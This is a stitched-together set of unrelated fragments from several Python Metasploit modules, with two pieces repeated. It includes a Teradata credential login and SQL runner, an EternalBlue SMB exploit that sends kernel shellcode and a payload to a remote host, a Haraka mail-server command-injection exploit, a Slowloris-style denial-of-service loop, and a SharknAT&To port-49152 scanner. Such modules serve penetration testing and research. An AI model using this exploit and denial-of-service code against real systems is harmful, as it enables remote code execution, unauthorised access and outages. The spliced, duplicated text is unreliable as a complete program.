logging.error('Python Teradata module missing, cannot continue') return # Set variables to current RHOST, and USERNAME and PASSWORD options host = args['rhost'] user = args['username'] password = args['password'] # Perform login attempt module.log(host + ' - ' + user + ':' + password + ' - Starting') try: session = udaExec.connect(method="odbc", system=host, username=user, password=password); except teradata.api.Error as e: logging.error(user + ':' + password + ' - ' + format(e)) return else: module.log(host + ' - ' + user + ':' + password + ' - Login Successful', level='good') try: query = args['sql'] module.log(host + ' - Starting - ' + query) for row in session.execute(query): outputRow=str(row) module.log(host + ' - ' + outputRow, level='good') except teradata.api.Error as e: logging.error(format(e)) return if __name__ == '__main__': module.run(metadata, run)
from pathlib import Path import sys import traceback try: from metasploit import module spec = importlib.util.spec_from_file_location( "service_ping", Path(__file__).absolute().parents[2] / "cotopaxi" / "service_ping.py", ) service_ping = importlib.util.module_from_spec(spec) spec.loader.exec_module(service_ping) except ImportError as exc: module.log("Error: {}".format(traceback.format_exc()), "error") sys.exit("Error: {}".format(traceback.format_exc()), "error") MODULE_PROTOCOL = "SSDP" METADATA = service_ping.prepare_metadata_ping(MODULE_PROTOCOL) def run(args): """Execute wrapper using provided arguments.""" args["PROTOCOLS"] = MODULE_PROTOCOL service_ping.run(args) if __name__ == "__main__": module.run(METADATA, run)
rport = int(args['RPORT']) numGroomConn = int(args['GroomAllocations']) smbuser = args['SMBUser'] if 'SMBUser' in args else '' smbpass = args['SMBPass'] if 'SMBPass' in args else '' # XXX: JSON-RPC requires UTF-8, so we Base64-encode the binary payload sc = eternalblue_kshellcode_x64 + b64decode(args['payload_encoded']) if len(sc) > 0xe80: module.log('Shellcode too long. The place that this exploit put a shellcode is limited to {} bytes.'.format(0xe80), 'error') sys.exit(1) # Now, shellcode is known. create a feaList feaList = createFeaList(len(sc)) module.log('shellcode size: {:d}'.format(len(sc))) module.log('numGroomConn: {:d}'.format(numGroomConn)) try: _exploit(args['RHOST'], rport, feaList, sc, numGroomConn, smbuser, smbpass) # XXX: Catch everything until we know better except Exception as e: module.log(str(e), 'error') sys.exit(1) module.log('done') if __name__ == '__main__': module.run(metadata, exploit)
c = smtplib.SMTP() try: (code, banner) = c.connect(args['rhost'], int(args['rport'])) except: return 'unknown' c.quit() if code == 220 and 'Haraka' in banner: versions = re.findall('(\d+\.\d+\.\d+)', banner) if versions: if StrictVersion(versions[0]) < StrictVersion('2.8.9'): return 'appears' else: return 'safe' else: return 'detected' elif code == 220: return 'detected' else: return 'unknown' def exploit(args): send_mail(args['email_to'], args['rhost'], args['command'], args['email_from'], int(args['rport'])) if __name__ == '__main__': module.run(metadata, exploit, soft_check=check_banner)
'required': True, 'default': None }, 'rport': { 'type': 'port', 'description': 'The target port', 'required': True, 'default': 49152 }, }, 'notes': { 'AKA': ['SharknAT&To', 'sharknatto'] } } def report_wproxy(target, response): # We don't use the response here, but if we were a banner scraper we could # print or report it module.report_vuln(target[0], 'wproxy', port=target[0]) if __name__ == "__main__": study = probe_scanner.make_scanner( # Payload and pattern are given and applied straight to the socket, so # they need to be bytes-like payload=b'\x2a\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00', pattern=b'^\\*\xce.{3}$', onmatch=report_wproxy) module.run(metadata, study)
try: module.log("Creating socket number %s" % i, 'debug') s = init_socket(host, port, use_ssl=use_ssl, rand_user_agent=rand_user_agent) except socket.error: break list_of_sockets.append(s) while True: module.log("Sending keep-alive headers... Socket count: %s" % len(list_of_sockets), 'info') for s in list(list_of_sockets): try: s.send("{}: {}\r\n".format(create_random_header_name(random.randint(8, 16)), random.randint(1, 5000)).encode("utf-8")) except socket.error: list_of_sockets.remove(s) for _ in range(socket_count - len(list_of_sockets)): module.log("Recreating socket...", 'debug') try: s = init_socket(host, port, use_ssl=use_ssl, rand_user_agent=rand_user_agent) if s: list_of_sockets.append(s) except socket.error: break time.sleep(delay) if __name__ == "__main__": module.run(metadata, run)
return(z1.read()) def check_banner(args): module.log('{}:{} Starting banner check for Haraka < 2.8.9'.format(args['rhost'], args['rport']), level='debug') c = smtplib.SMTP() (code, banner) = c.connect(args['rhost'], int(args['rport'])) c.quit() if code == 220 and 'Haraka' in banner: versions = re.findall('(\d+\.\d+\.\d+)', banner) if versions: if StrictVersion(versions[0]) < StrictVersion('2.8.9'): return 'appears' else: return 'safe' else: return 'detected' elif code == 220: return 'detected' else: return 'unknown' def exploit(args): send_mail(args['email_to'], args['rhost'], args['command'], args['email_from'], int(args['rport'])) if __name__ == '__main__': module.run(metadata, exploit, soft_check=check_banner)
'references': [ {'type': 'cve', 'ref': '2017-14117'}, {'type': 'url', 'ref': 'https://www.nomotion.net/blog/sharknatto/'}, {'type': 'url', 'ref': 'https://blog.rapid7.com/2017/09/07/measuring-sharknat-to-exposures/#vulnerability5port49152tcpexposure'}, {'type': 'aka', 'ref': 'SharknAT&To'}, {'type': 'aka', 'ref': 'sharknatto'} ], 'type': 'scanner.multi', 'options': { 'rhosts': {'type': 'address_range', 'description': 'The target address', 'required': True, 'default': None}, 'rport': {'type': 'port', 'description': 'The target port', 'required': True, 'default': 49152}, }, } def report_wproxy(target, response): # We don't use the response here, but if we were a banner scraper we could # print or report it module.report_vuln(target[0], 'wproxy', port=target[0]) if __name__ == "__main__": study = probe_scanner.make_scanner( # Payload and pattern are given and applied straight to the socket, so # they need to be bytes-like payload=b'\x2a\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00', pattern=b'^\\*\xce.{3}$', onmatch=report_wproxy ) module.run(metadata, study)